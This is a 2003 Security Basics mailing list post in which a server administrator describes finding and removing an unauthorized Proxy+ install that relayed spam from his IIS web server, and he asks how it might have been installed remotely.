Security Basics mailing list archives
Re: Proxy+ Trojan
From: "Bill" <proftpd () anatek com>
Date: Mon, 3 Feb 2003 18:57:45 -0600
Hamish, Sorry, I should have provided a better desicription to begin.
The simple answer is find out how it was put on there, and block off that
That's the problem -- it's not so simple. This is a dedicated web server (Win2K/IIS5) that I have co-located in a top-tier data center. The app was installed remotely, and no logins were compromised. I had just finished having my SQL Server harded (about 10 days _before_ Slammer!) and we ran some extensive password cracking software then. I was feeling pretty ok, and then I started getting SpamCop reports. I checked for an open relay a hundred times, but couldn't find anything. After a couple of days I found the copy of Proxy+ and blew it away. I then installed a software firewall, and I'm ok now (except for learning how to configure the firewall :-) ). The real problem is that I don't know how this install was done. I would really like to address this as an independent issue. I must have something configured horribly wrong, but how do I start the detective work? And now, everything seems suspicious. I feel the urge to disable every service! :-) Anyhow, if you have ideas on how an app could get installed remotely, I could start investigating.
Then do a security audit on that machine.
I hae subscribed to the SecurityMetrics offering, which I think will definitely help on an ongoing basis. But my situation is not ideal. I'm misconfigured, I'm sure, but hadnling it with a firewall. I want to be correctly configured and have the firewall as an extra measure of safety. I would enjoy hearing your speculation! Thanks! Bill
Current thread:
- Proxy+ Trojan Bill (Feb 03)
- RE: Proxy+ Trojan dave (Feb 05)
- <Possible follow-ups>
- Re: Proxy+ Trojan KoRe MeLtDoWn (Feb 04)
- Re: Proxy+ Trojan Bill (Feb 05)
- RE: Proxy+ Trojan dave (Feb 04)
- Re: Proxy+ Trojan Bill (Feb 05)
- Re: Proxy+ Trojan KoRe MeLtDoWn (Feb 05)